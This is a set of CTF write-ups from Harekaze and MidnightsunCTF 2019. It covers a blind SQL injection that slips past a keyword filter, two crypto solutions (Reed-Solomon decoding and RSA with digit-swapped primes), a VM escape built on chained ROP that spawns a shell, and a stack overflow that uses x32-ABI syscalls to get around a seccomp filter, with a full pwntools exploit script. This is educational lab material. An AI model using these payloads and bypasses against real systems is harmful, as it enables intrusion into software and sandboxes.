• Harekaze CTF 2019 - SQLite Voting

    The challenge consisted of a webpage with four different animal emojis, clicking on one sent a vote for that animal. It was promised that results will be published at the end of the CTF.

    We are provided with the database schema which consists of two tables, one for all the votes and one containing the precious flag.

    Looking at the provided code we can easily spot an attack vector:

    ...
    $id = $_POST['id'];
    ...
    $res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");
    ...
    

    The only issue being that $id is filtered using a custom function:

    function is_valid($str) {
      $banword = [
        // dangerous chars
        // " % ' * + / < = > \ _ ` ~ -
        "[\"%'*+\\/<=>\\\\_`~-]",
        // whitespace chars
        '\s',
        // dangerous functions
        'blob', 'load_extension', 'char', 'unicode',
        '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp',
        'in', 'limit', 'order', 'union', 'join'
      ];
      $regexp = '/' . implode('|', $banword) . '/i';
      if (preg_match($regexp, $str)) {
        return false;
      }
      return true;
    }
    

    So we are not allowed to use whitespace, no functions like char, like or substr that could help us compare strings and they even limited how we can query other tables by blocking union and join.

    After playing around with an sqlite shell for a few minutes it became clear that subqueries using something like SELECT(flag)FROM(flag) seemed to be working fine, now we need two things:

    • A way of actually getting a result back (no query results are returned)
    • A way of comparing the flag in the database with given values (since we are attacking it completely blind)

    Getting a result back was actually quite easy, we can just let sqlite try to interpret the flag as json. Since it has brackets and (hopefully) doesn’t follow correct json syntax that will result in an error which we can’t see but at least are told that something went wrong.

    Trying this out we crafted two queries:

    • (SELECT(JSON(flag))FROM(flag)WHERE(flag)IS(0)) This one succeeded as json(flag) is never executed
    • (SELECT(JSON(flag))FROM(flag)WHERE(flag)IS(flag)) This one fails as the flag is no valid json string

    Now we needed a way to actually get any information about the content… this is where most of the time got spent.

    Playing around with the shell a bit more we found that we can convert the flag into hex presentation and that sqlite is using weak typing. Trying out something like SELECT REPLACE("1234", 12, ""); results in 34.

    Taking the redacted flag from the given schema (HarekazeCTF{<redacted>}) and converting it into hex results in 486172656b617a654354467b3c72656461637465643e7d. We noticed that there are lot of parts with just digits and no letters 486172656 b 617 a 654354467 b 3 c 72656461637465643 e 7 d, and since we could replace numbers with anything we wanted to we would be able to basically reduce the length of the given hex-string by the number of matches of our replacement.

    First we tried to find the length of the flag, that was actually quite easy to do, just probing around with a simple query:

    • (SELECT(JSON(flag))FROM(flag)WHERE(LENGTH(flag))IS(36)) Thank you for your vote!
    • (SELECT(JSON(flag))FROM(flag)WHERE(LENGTH(flag))IS(37)) Thank you for your vote!
    • (SELECT(JSON(flag))FROM(flag)WHERE(LENGTH(flag))IS(38)) An error occured…

    So we know the flag is 38 characters long, or 76 hex characters.

    Next we probed around for the count of each digit in the hex-flag, here an example for the digit 4 (which was in there 7 times):

    • (SELECT(JSON(flag))FROM(flag)WHERE(LENGTH(REPLACE(HEX(flag),4,hex(null))))IS(76)) Thank you for your vote!
    • (SELECT(JSON(flag))FROM(flag)WHERE(LENGTH(REPLACE(HEX(flag),4,hex(null))))IS(70)) Thank you for your vote!
    • (SELECT(JSON(flag))FROM(flag)WHERE(LENGTH(REPLACE(HEX(flag),4,hex(null))))IS(69)) An error occured

    Using that information we now were able to piece together parts of the flag by trying number sequences instead of single digits, each time decreasing the length accordingly and adding a digit, if it was correct we’d get an error otherwise we were thanked for our patience.

    After getting into the flow this was actually done quite quickly in a few minutes by hand, resulting in the following sequence of numbers and 12 characters ([a-f]) left unknown:

    • 345
    • 34316
    • 34353733727
    • 3137335
    • 35716
    • 37305
    • 62335
    • 486172656
    • 617
    • 654354467
    • 5
    • 6

    We knew that the flag would start with HarekazeCTF{ so we quickly determined that 486172656 b 617 a 654354467 b is the start, already giving us the order for 3 of the numbers in the list. Since the flag ends with } (0x7d) we know that we’d need a number with a 7 at the end, which after sorting out the start could only be 34353733727.

    After that we had the following numbers left:

    • 345
    • 34316
    • 3137335
    • 35716
    • 37305
    • 62335
    • 5
    • 6

    Noticing that most of those numbers (excluding the last digit) resultet in valid ascii and most of them ended with a 5 and 0x5f being an underscore which is often used as a flag separator we quickly filled that in, leaving us only with 3 hex characters and all being prefixed with a 6. Since the flag seemed to be written in l33t-speak and m (0x6d) is one of the characters which is really hard to represent that way, so we picked that sequence to fill in the last gaps.

    At that point we had the following list:

    • 486172656B617A654354467B HarekazeCTF{
    • 345F 4_
    • 34316D 5F 41m_ (we moved the 5F from the end here since it fits the pattern of other parts)
    • 3137335F 173_
    • 35716D 5qm
    • 37305F 70_
    • 62335F b3_
    • 5F _
    • 6D m
    • 34353733727 4573r}

    Sorting that around we got something like HarekazeCTF{41m_70_b3_4_5qm173_m4573r}, and fixing one of our guesses replacing the m with an l resulted in the flag: HarekazeCTF{41m_70_b3_4_5ql173_m4573r}.

  • MidnightsunCTF Quals 2019 - tulpan257

    The following sage script was given:

    flag = "XXXXXXXXXXXXXXXXXXXXXXXXX"
    p = 257
    k = len(flag) + 1
    
    def prover(secret, beta=107, alpha=42):
        F = GF(p)
        FF.<x> = GF(p)[]
        r = FF.random_element(k - 1)
        masked = (r * secret).mod(x^k + 1)
        y = [
            masked(i) if randint(0, beta) >= alpha else
            masked(i) + F.random_element()
            for i in range(0, beta)
        ]
        return r.coeffs(), y
    
    sage: prover(flag)
    [141, 56, 14, 221, 102, 34, 216, 33, 204, 223, 194, 174, 179, 67, 226, 101, 79, 236, 214, 198, 129, 11, 52, 148, 180, 49]
    [138, 229, 245, 162, 184, 116, 195, 143, 68, 1, 94, 35, 73, 202, 113, 235, 46, 97, 100, 148, 191, 102, 60, 118, 230, 256, 9, 175, 203, 136, 232, 82, 242, 236, 37, 201, 37, 116, 149, 90, 240, 200, 100, 179, 154, 69, 243, 43, 186, 167, 94, 99, 158, 149, 218, 137, 87, 178, 187, 195, 59, 191, 194, 198, 247, 230, 110, 222, 117, 164, 218, 228, 242, 182, 165, 174, 149, 150, 120, 202, 94, 148, 206, 69, 12, 178, 239, 160, 7, 235, 153, 187, 251, 83, 213, 179, 242, 215, 83, 88, 1, 108, 32, 138, 180, 102, 34]
    

    It doesn’t work quite as given - prover() must be given a polynomial, not a string. I figured that this polynomial was probably just using the flag string as coefficients, and just tried to recover that secret polynomial first (under the assumption that it was of degree kk). The r.coeffs() output has length 2626, so this means that k=26k=26.

    Now the hard part was recovering the polynomial masked - if I knew that, I could just multiply by the multiplicative inverse of rr in the ring GF(p)[x]/(xk+1)GF(p)[x]/(x^k+1) (which fortunately exists). The known output y is obtained by evaluating masked at the positions 0,1,,1060,1,\ldots,106 - however, with random chance of 42107\frac{42}{107}, a random output modulo pp is chosen instead. I also know that masked is a polynomial of degree k1k-1 - so if I just knew kk correct points, I could simply construct the Lagrange Polynomial through these points.

    With the output containing errors I had two choices:

    • Guessing: If I just guess 26 points that had the correct output, I could recover the original polynomial. A quick calculation shows that this has about chance 21062\cdot 10^{-6} of happening - and it is easy to detect, as some random polynomial through 26 of the points will match y in far less places than the correct one. Having now tried it after the CTF, it works very well.
    • Using someone elses work: My first instinct however was to search for a more elegant algorithm for the problem. In retrospect, just using brute force would probably have saved me some time - but this variant was at least quite educational.

    I knew that problems of the type “given a set of discrete equations, find a solution that satisfies a high number of them” were quite typical for Coding theory, so I started looking at well-known error-correcting codes. After a little reading, the Reed-Solomon Code jumped out to me - Wikipedia gives the codewords of a Reed-Solomon Code as {(p(a1),p(a2),,p(an))p is a polynomial over F of degree k}\{(p(a_1), p(a_2), \ldots, p(a_n))\mid p \text{ is a polynomial over } F \text{ of degree } k\}. Setting n=107,ai=i1,k=26,F=GF(p)n=107, a_i=i-1, k=26, F=GF(p), this is exactly the kind of output we are dealing with. So now I just needed to decode the codeword given to me in y to one that lies in that Reed-Solomon Code. Fortunately, sage has builtin functions for everything:

    sage: p, k = 257, 26
    sage: F = GF(p)
    sage: FF.<x> = F[]
    sage: from sage.coding.grs import *
    sage: C=GeneralizedReedSolomonCode([F(i) for i in range(107)],26)
    sage: D=GRSBerlekampWelchDecoder(C)
    sage: D.decode_to_message(vector(y,F))
    DecodingError: Decoding failed because the number of errors exceeded the decoding radius
    sage: D.decoding_radius()
    40
    

    Whoops - it seems there are just a few errors too many in the output for the BerlekampWelchDecoder to handle. All the other decoders seemed to have the same problem… until I somehow managed to find the Guruswami-Sudan decoder. It conveniently takes a parameter tau that specifies (within limits) the number of errors it will be able correct:

    sage: from sage.coding.guruswami_sudan.gs_decoder import *
    sage: D=GRSGuruswamiSudanDecoder(C,45)
    sage: masked=D.decode_to_message(vector(y,F))[0]
    sage: masked
    136*x^25 + 181*x^24 + 158*x^23 + 233*x^22 + 215*x^21 + 95*x^20 + 235*x^19 + 76*x^18 + 133*x^17 + 199*x^16 + 105*x^15 + 46*x^14 + 53*x^13 + 123*x^12 + 150*x^11 + 28*x^10 + 87*x^9 + 122*x^8 + 59*x^7 + 177*x^6 + 174*x^5 + 200*x^4 + 143*x^3 + 77*x^2 + 65*x + 138
    

    Finally it’s just a matter of multiplying by r1r^{-1}:

    sage: R = FF.quo(x^k+1)
    sage: flag = R(masked)*R(r)^(-1)
    sage: "".join([chr(i) for i in flag]) # iterates over coefficients
    'N0p3_th1s_15_n0T_R1ng_LpN\x00'
    

    Lessons learned

    • Coding theory has all kinds of useful stuff for “out of n relations, only k hold, but we don’t know which”-type situations
    • If a builtin function of sage isn’t quite good or general enough, there is probably a better one somewhere
    • Don’t waste time on elegant solutions if you can just guess
  • MidnightsunCTF Quals 2019 - open-gyckel-crypto

    while True:
        p = next_prime(random.randint(0, 10**500))
        if len(str(p)) != 500:
            continue
        q = Integer(int(str(p)[250:] + str(p)[:250]))
        if q.is_prime():
            break
            
    
    >> p * q
    6146024643941503757217715363256725297474582575057128830681803952150464985329239705861504172069973746764596350359462277397739134788481500502387716062571912861345331755396960400668616401300689786263797654804338789112750913548642482662809784602704174564885963722422299918304645125966515910080631257020529794610856299507980828520629245187681653190311198219403188372517508164871722474627810848320169613689716990022730088459821267951447201867517626158744944551445617408339432658443496118067189012595726036261168251749186085493288311314941584653172141498507582033165337666796171940245572657593635107816849481870784366174740265906662098222589242955869775789843661127411493630943226776741646463845546396213149027737171200372484413863565567390083316799725434855960709541328144058411807356607316377373917707720258565704707770352508576366053160404360862976120784192082599228536166245480722359263166146184992593735550019325337524138545418186493193366973466749752806880403086988489013389009843734224502284325825989
    >> pow(m, 65537, p * q)
    3572030904528013180691184031825875018560018830056027446538585108046374607199842488138228426133620939067295245642162497675548656988031367698701161407333098336631469820625758165691216722102954230039803062571915807926805842311530808555825502457067483266045370081698397234434007948071948000301674260889742505705689105049976374758307610890478956315615270346544731420764623411884522772647227485422185741972880247913540403503772495257290866993158120540920089734332219140638231258380844037266185237491107152677366121632644100162619601924591268704611229987050199163281293994502948372872259033482851597923104208041748275169138684724529347356731689014177146308752441720676090362823472528200449780703866597108548404590800249980122989260948630061847682889941399385098680402067366390334436739269305750501804725143228482932118740926602413362231953728010397307348540059759689560081517028515279382023371274623802620886821099991568528927696544505357451279263250695311793770159474896431625763008081110926072287874375257
    

    If we write pp as:

    p=10250x+yp = 10^{250}x+y

    with 0x,y<102500\leq x,y<10^{250}, then qq is obtained by swapping xx and yy:

    q=10250y+xq = 10^{250}y+x

    This means that for n=pqn=pq we have:

    n=pq=(10250x+y)(10250y+x)=n = pq = (10^{250}x+y)(10^{250}y+x) = =10500xy+10250x2+10250y2+xy=(10500+1)xy+10250(x2+y2)=10^{500}xy + 10^{250}x^2 + 10^{250}y^2 + xy = (10^{500}+1)xy+10^{250}(x^2+y^2)

    But now n0xy+10250(x2+y2)mod10500+1n \equiv 0xy + 10^{250}(x^2+y^2) \mod 10^{500}+1 or x2+y2n10250mod10500+1.x^2+y^2 \equiv \frac{n}{10^{250}} \mod 10^{500}+1\,. As 1025010^{250} and 10500+110^{500}+1 are coprime, this is well-defined.

    In sage:

    sage: R=Zmod(10^500+1)
    sage: s = Integer(R(n)*R(10^250)^-1)
    

    But on the other hand, as xx and yy are less than 1025010^{250}, the sum of their squares must be less than (10250)2+(10250)2=210500(10^{250})^2+(10^{250})^2=2\cdot 10^{500}. As we already know the residue of x2+y2x^2+y^2 mod 10500+110^{500}+1, this means that we only have two possibilities left: ss and s+10500+1s+10^{500}+1. It is possible to quite easily exclude the first one: ss is divisible by 33 but not 99, which would be in contradiction to the Sum of two squares theorem. Of course, one can also just try both values.

    This means that x2+y2x^2+y^2 must be s+10500+1s+10^{500}+1. Using n=(10500+1)xy+10250(x2+y2)n=(10^{500}+1)xy+10^{250}(x^2+y^2) we now have two equations for two variables. Those can be solved by substituting and solving the resulting biquadratic equation, or just using sage:

    sage: x,y=var("x,y")
    sage: solve([n==(10^500+1)*x*y+10^250*(x^2+y^2),x^2+y^2==s+10^500+1],(x,y))
    [[x == 6704087713997099865507815769768764401477034704508108261256143985284139367993820913412851771729239540206881848078387952673084087851136091482870695733338884807660355569782830813482768223955545908153884900037741101021721778447622913463893844919116113159, y == 9167577910876006891858257597237629440949705918335724259091862313200766026122707397405770653228405765712936180484223756343702067850288957263434298651591281476391443835610092615155677011406076889438184185284410734629391841138106293296764467469014716371], ...]
    

    (symmetric and negative solutions omitted). Now it’s just a matter of recovering pp and qq and deciphering:

    sage: p=10^250*x+y
    sage: q=10^250*y+x
    sage: p*q==n
    True
    sage: d=ZZ.quo((p-1)*(q-1))(65537)**-1
    sage: m=int(pow(c,d,n))
    sage: binascii.a2b_hex(hex(m)[2:-1])
    'midnight{w3ll_wh47_d0_y0u_kn0w_7h15_15_4c7u4lly_7h3_w0rld5_l0n6357_fl46_4nd_y0u_f0und_17_50_y0u_5h0uld_b3_pr0ud_0f_y0ur53lf_50_uhmm_60_pr1n7_7h15_0n_4_75h1r7_0r_50m37h1n6_4nd_4m4z3_7h3_p30pl3_4r0und_y0u}\x99\xd3\x84\x00\xdd\x98\xbf\xedv\xe8|\xd3#\x01sR\x83\x9f\xce\x9fHg\xef\xfb\x07\x05\xc7\xd1R4*\xbc\x9e`\x9aW\x10\x0b5\xc0\xc0\xf9\xcc2dD\x00\xd5\x89\xfd2\xd2l\xe3N3\x8bU6}[\x92\xd5\xf5\x0fO\xde-\xf1\xb0\xbe\xaf\xc5\xcfM\xadyo\xd9\xbf\xff\xeci\xd5$\xf99\xde\xad\xaaP{\xfc\xf7\x91 o2\x99M\x9cE\xfe@,\xc0\x8d\x88wU\xb0\x82X\xa2;r\xeaq\x8eV\x05t\x94\xb8\x8c\xba\x90\xf5\xa8\xf9\x17$\x94\xf4:\x11\x9e\xfc\x0b]\x97\xbbMv9\x865f*$\x93r\xf65j\xc0jk\xf0\xab\xd5\t\xb3\xda\x17\xb0~\x05}\xc4@(\xa8\r\x16\x01V\xcdm\x901\x17\x18\xf3\xfd\xd6L\xa7\x13|\xaa\x9d\x1e_\xb4%g/Q+\xff\xc1\xbe\xf1fB#g\xa8\xda\xdd4'
    
  • MidnightsunCTF Quals 2019 - hfs-vm (287 pts, 42 solves) and hfs-vm2 (660 pts, 14 solves)

    hfs-vm:

    Write a program in my crappy VM language.

    Service: nc hfs-vm-01.play.midnightsunctf.se 4096

    Download: hfs-vm.tar.gz

    hfs-vm2:

    Escape the VM to get a flag.

    Service: nc hfs-vm-01.play.midnightsunctf.se 4096

    Download: hfs-vm.tar.gz

    Analysis

    The provided service implements a VM for a custom architecture as well as a ‘kernel’ which the VM process uses to interact with the system.

    userspace and kernel

    The userspace and the kernel are implemented using two processes; the binary forks on startup and the parent becomes the kernel while the child executes the userspace. They communicate via both a socket pair and a shared memory region.

    The kernel process initially resets its stack canary, to get a canary different from that in the userspace process.

    The userspace process reads bytecode from the user and implements a simple VM to ‘execute’ the bytecode. Additionally, it enables the strict seccomp mode, which only allows the read, write and exit system calls.

    ‘system calls’ between the userspace process and the kernel process are implemented using the socket pair and shared memory mentioned above. To enter a system call, the userspace process sends the system call number and arguments over the socket, and reads the return value from the socket. The kernel process on the other hand reads from the socket, then executes the system call, and writes the return value back to the socket. This way, one of the two processes is always blocked reading. Large arguments or return values are passed via the shared memory region: the first two bytes of the region contain the size of the data, followed by the raw data.

    Custom VM

    As already mentioned above, the userspace process implements a simple VM for a custom architecture. The virtual 16-bit CPU has 16 registers, numbered 0 through 15, with register 14 and 15 doubling as the stack and instruction pointer. The stack has a fixed size of 32 words. Internally, the state of the VM is stored in the following struct on the stack of the userspace process:

    struct state_t {
      int fd;
      int pad;
      void *shared_mem;
      uint16_t regs[14];
      uint16_t reg_sp;
      uint16_t reg_pc;
      uint16_t stack[32];
    };
    

    The custom architecture executes bytecode with 4 byte long instructions encoding the instruction type and up to two operands. The following instructions are supported:

    • mov reg, imm, add reg, imm, sub reg, imm, xor reg, imm: move/add/subtract/xor the register reg with the 16-bit immediate value imm and store the result in reg

    • mov reg, reg, add reg, reg, sub reg, reg, xor reg, reg: move/add/subtract/xor the first register with the second register and store the result in the second register

    • xchg reg, reg: swap the contents of the two registers

    • push reg, push imm: push the register / immediate value onto the stack

    • pop reg: pop a value off the stack and store it in reg

    • setstack reg, imm, setstack reg, reg: use the value of the register reg as an (absolute) index into the stack; set the stack value at that index to reg/imm

    • getstack reg, reg: use the value of the first register as an (absolute) index into the stack; store the stack value at that index in the second register

    • syscall: trigger a system call; the first three registers are passed to the kernel as the syscall number and two arguments

    • debug: output the values of all registers and the stack

    The syscall instruction additionally passes the VM’s stack to the kernel via the shared memory region. When looking at the implementation of these instructions, we notice that push and pop perform bounds checks on the stack, while setstack and getstack don’t!

    The First Flag

    At this point we can already obtain the first flag by issuing syscall 3, which copies the flag onto the VM’s stack, and then executing the debug instruction.

    Flag: midnight{m3_h4bl0_vm}

    Exploitation

    Because of the strict seccomp mode used by the userspace process, we cannot spawn a shell from that process. We have to use the bug discovered above to gain control of the userspace process, afterwards use another bug in the kernel to escalate further and then spawn a shell.

    ROP in the userspace

    Using the missing bounds checks mentioned above, we can first leak both the stack canary (of the userspace process) and the base address of the binary (which will be the same in the userspace and kernel processes). After that, we overwrite the stack of the userspace process and execute a ROP chain. Because our previously sent bytecode has to write this chain, we are limited in size. Thus, the first ROP chain will just read some input (the second ROP chain) onto the data segment of the process and pivot the stack there.

    # gadgets encoded as tuples
    # the first element is the gadget/address
    # the second element indicates if the address is relative to the binary's base
    
    # read(0, data + 0xa00, 0xe00)
    (pop_rdi, True),
    (0, False),
    (pop_rsi, True),
    (0x203000 + 0xa00, True),
    (pop_rdx, True),
    (0xe00, False),
    (binary.plt.read, True),
    # rsp = data + 0xa00
    (pop_rsp, True),
    (0x203000 + 0xa00, True),
    

    We have to write this first ROP chain using the bytecode executed in the VM, using the getstack and setstack instructions as explained above. Because we have no way to leak the base address of the binary before sending the bytecode, we have to use the bytecode to adjust the addresses of our gadgets.

    # generate the bytecode for a given ROP chain
    # abbreviations for opcode operands: r = register, s = stack, i = immediate
    
    bc = ''
    # set regs 1, 2, 3, 4 to ret addr (4 is not touched, because always zero)
    bc += mov_rs(1, 52)
    bc += mov_rs(2, 53)
    bc += mov_rs(3, 54)
    # adjust regs to base addr (subtract offset of return address)
    bc += sub_ri(1, 0xe6e)
    # debug to leak base addr
    bc += p32(0xa)
    
    idx = 52
    for val, rel in rop:
        if rel:
            # set regs 5, 6, 7, 8 to val
            bc += mov_ri(5, val & 0xffff)
            bc += mov_ri(6, (val >> 16) & 0xffff)
            bc += mov_ri(7, (val >> 32) & 0xffff)
            bc += mov_ri(8, (val >> 48) & 0xffff)
            # add base addr
            bc += add_rr(5, 1)
            bc += add_rr(6, 2)
            bc += add_rr(7, 3)
            # write to stack
            bc += mov_sr(idx, 5)
            bc += mov_sr(idx + 1, 6)
            bc += mov_sr(idx + 2, 7)
            bc += mov_sr(idx + 3, 8)
        else:
            # write to stack
            bc += mov_si(idx, val & 0xffff)
            bc += mov_si(idx + 1, (val >> 16) & 0xffff)
            bc += mov_si(idx + 2, (val >> 32) & 0xffff)
            bc += mov_si(idx + 3, (val >> 48) & 0xffff)
        idx += 4
    

    For exploiting the kernel, we will need access to the shared memory region, so we use the second ROP chain to leak its address and read a third ROP chain.

    # second rop chain to leak shared_mem pointer
    rop = ROP(binary)
    rop.write(1, binary.address + off_shared_mem, 8)
    rop.read(0, binary.address + off_second_chain, 0x500)
    rop.raw(binary.address + pop_rsp)
    rop.raw(binary.address + off_second_chain)
    

    ROP in the kernel

    Now that we have all info we need and the ability to execute an arbitrarily long ROP chain, we can search for a bug in the kernel.

    The first bug is obvious when looking at the syscall handler: the shared memory region (which also contains its own size and is fully controlled by userspace) is copied in a fixed-size buffer on the stack, leading to a simple stack buffer overflow. However, there is a stack canary preventing us from exploiting this bug alone.

    The second bug is a synchronization issue: right before the kernel returns from a syscall, the stack buffer is copied back into the shared memory region, using the size specified in the shared memory region. That means, if we manage to increase the size while the kernel performs a syscall, we can leak data from the kernel stack! During normal operation one of the two processes always blocks while reading from the socket, but now that we control the userspace, we can trigger a syscall and continue execution in userspace without waiting for the syscall to finish.

    At first this sounds like a hard race condition we have to win, until we look at syscall number 4 which, when supplied with a specific argument, sleeps for a total of 4 seconds. That’s more than enough time to increase the size of the shared memory region. The last issue we have is that, to get the correct timing, the userspace process needs to wait too, but sleep (actually nanosleep) is blocked by the seccomp filter. We can still let the userspace process wait by issuing a dummy read from stdin and waiting the correct amount in our exploit script.

    So here’s the plan for the third ROP chain: we trigger syscall number 4 and wait a second for the kernel to enter the syscall. Then we overwrite the size of the shared memory region and wait for the kernel to return from the syscall. Now the kernel’s stack canary is stored in the shared memory region, so we print the kernel’s canary to stdout. Our exploit script uses that canary and the info we acquired previously to craft a ROP chain for the kernel. The ROP chain in the userspace continues and reads the ROP chain for the kernel from stdin, into the shared memory region. Finally, it triggers any syscall. The kernel now copies the shared memory region onto its stack, smashing it in the process.

    # third rop chain to trigger ROP in kernel
    rop = ROP(binary)
    rop_data = ''
    rop_data_addr = binary.address + off_second_chain + 0x200
    
    def data_sys(num, arg1=0, arg2=0):
        return p8(num) + p16(arg1) + p16(arg2)
    
    # trigger sys_random(4)
    rop.write(parent_fd, rop_data_addr, 5)
    rop_data += data_sys(4, 4)
    # overwrite shared_mem size
    rop.read(0, shared_mem, 2)
    # dummy read, just for waiting a bit
    rop.read(0, shared_mem, 2)
    # leak parent stack canary
    rop.write(1, shared_mem + 74, 8)
    # read rop chain for parent to shared_mem
    rop.read(0, shared_mem, 0x1000)
    # trigger rop in parent, via sys_ls()
    rop.write(parent_fd, rop_data_addr + len(rop_data), 5)
    rop_data += data_sys(6)
    # exit
    rop.exit(0)
    

    The ROP chain executed in the kernel is very simple: since the binary imports system, we can return to it, passing sh as argument (which we can also place in the shared memory), and finally get a shell!

    rop = ROP(binary)
    # 'sh' is placed at shared_mem + 0x300
    rop.system(shared_mem + 0x300)
    

    Flag: midnight{7h3re5_n0_I_iN_VM_bu7_iF_th3r3_w@s_1t_w0uld_b3_VIM}

    You can find the full exploit script here.

  • MidnightsunCTF Quals 2019 - gissa2 (631 pts, 15 solves)

    Last year some dirty hackers found a way around my guessing challenge, well I patched the issue. Can you guess again?

    Service: nc gissa-igen-01.play.midnightsunctf.se 4096

    Download: gissa_igen.tar.gz

    Analysis

    The provided binary first mmaps the flag and then lets us try to guess it. After mapping the flag, the binary also installs a seccomp filter which forbids the system calls open, clone, fork, vfork, execve, creat, openat and execveat.

    The length of the buffer our input is read to is stored in the main() function as a uint16_t, but a pointer to this length is passed to the guess_flag() function as a uint32_t *. Right after the buffer length the current number of tries is stored, so when guess_flag() accesses the buffer length, it actually uses both of these values. This has the effect that on our first guess, the buffer length has the correct value of 0x8b, but on the second guess, the buffer length has increased to 0x1008b, which leads to a stack buffer overflow.

    Exploit: ROP

    No canary is used, so we can easily overwrite the return address. The only problem left before we can execute a ROP chain is that we don’t know the binary’s base address (it’s a PIE). But that’s easily solved: because the binary doesn’t terminate our input string, we can leak the original return address before sending our ROP chain. However, when we gain control of the execution flow, the flag has already been unmapped and its file descriptor closed. There’s no way for us to divert the execution flow before that point, so we have to find a way to bypass the seccomp filter.

    ROP to Shellcode

    To ease bypassing of the seccomp filter, let’s first set up a ROP chain to get shellcode execution. The ROP chain is pretty straightforward: map some RWX memory at a fixed address, read our next input into it, and jump there.

    sc_addr = 0x1337000
    rop = rop_call(binary + off_mmap, sc_addr, 0x10000, 7, 0x32, -1, 0)
    rop += rop_call(binary + off_read, 0, sc_addr, 0x10000)
    rop += p64(sc_addr)
    

    Bypass seccomp Filter

    Now that we can execute shellcode, the only thing left is somehow bypassing the seccomp filter in order to read the flag. Here’s the filter used:

     line  CODE  JT   JF      K
    =================================
     0000: 0x20 0x00 0x00 0x00000004  A = arch
     0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
     0002: 0x06 0x00 0x00 0x00000000  return KILL
     0003: 0x20 0x00 0x00 0x00000000  A = sys_number
     0004: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0006
     0005: 0x06 0x00 0x00 0x00000000  return KILL
     0006: 0x15 0x00 0x01 0x00000038  if (A != clone) goto 0008
     0007: 0x06 0x00 0x00 0x00000000  return KILL
     0008: 0x15 0x00 0x01 0x00000039  if (A != fork) goto 0010
     0009: 0x06 0x00 0x00 0x00000000  return KILL
     0010: 0x15 0x00 0x01 0x0000003a  if (A != vfork) goto 0012
     0011: 0x06 0x00 0x00 0x00000000  return KILL
     0012: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0014
     0013: 0x06 0x00 0x00 0x00000000  return KILL
     0014: 0x15 0x00 0x01 0x00000055  if (A != creat) goto 0016
     0015: 0x06 0x00 0x00 0x00000000  return KILL
     0016: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0018
     0017: 0x06 0x00 0x00 0x00000000  return KILL
     0018: 0x15 0x00 0x01 0x00000142  if (A != execveat) goto 0020
     0019: 0x06 0x00 0x00 0x00000000  return KILL
     0020: 0x06 0x00 0x00 0x7fff0000  return ALLOW
    

    The filter checks the current architecture, so we cannot bypass it by switching to 32-bit mode However, if we set bit 30 of the syscall number, we can access the ‘x32’ syscall ABI, which provides basically the same system calls and is not blocked by the seccomp filter. Thus, using syscall 0x40000002 instead of 2 for open lets us open and print the flag.

    # open(0x1338000, 0, 0) - 0x1338000 contains the path
    mov rax, 0x40000002
    mov rdi, 0x1338000
    mov rsi, 0
    mov rdx, 0
    syscall
    
    # read(flag, 0x1338000, 0x100)
    mov rdi, rax
    mov rax, 0
    mov rsi, 0x1338000
    mov rdx, 0x100
    syscall
    
    # write(1, 0x1338000, 0x100)
    mov rax, 1
    mov rdi, 1
    mov rsi, 0x1338000
    mov rdx, 0x100
    syscall
    

    Flag: midnight{I_kN3w_1_5H0ulD_h4v3_jUst_uS3d_l1B5eCC0mP}

    Exploit Code

    from pwn import *
    
    context.binary = 'gissa_igen'
    
    shellcode = asm('''
        mov rax, 0x40000002
        mov rdi, 0x1338000
        mov rsi, 0
        mov rdx, 0
        syscall
    
        mov rdi, rax
        mov rax, 0
        mov rsi, 0x1338000
        mov rdx, 0x100
        syscall
    
        mov rax, 1
        mov rdi, 1
        mov rsi, 0x1338000
        mov rdx, 0x100
        syscall
    ''')
    
    g = remote('gissa-igen-01.play.midnightsunctf.se', 4096)
    
    # increase buf_len
    g.sendlineafter('flag (', '')
    g.recvuntil('try again')
    
    # overwrite buf_len with 168
    g.sendlineafter('flag (', 'A' * 140 + p32(168) + p64(0) * 2)
    
    # leak binary addr
    g.sendafter('flag (', 'A' * 140 + '\xff\xff' + '\x01\x01' + 'B' * 8 + '\xff' * 8 + 'C' * 8)
    g.recvuntil('C' * 8)
    binary = u64(g.recvuntil(' is not right', drop=True).ljust(8, '\0')) - 0xbc5
    info("binary @ 0x%x", binary)
    
    # ROP to shellcode
    
    def rop_call(func, rdi=0, rsi=0, rdx=0, rcx=0, r8=0, r9=0):
        return flat(binary + 0xc1f, rcx, 0, 0, 0, binary + 0xc1d, rdx, r9, r8, rdi, rsi, func)
    
    sc_addr = 0x1337000
    # mmap
    rop = rop_call(binary + 0xc0c, sc_addr, 0x10000, 7, 0x32, -1, 0)
    # read
    rop += rop_call(binary + 0xbd4, 0, sc_addr, 0x10000)
    rop += p64(sc_addr)
    g.sendlineafter('flag (', 'A' * 168 + rop)
    
    g.sendafter('not right.\n', shellcode.ljust(0x1000, '\0') + '/home/ctf/flag\0')
    
    g.interactive()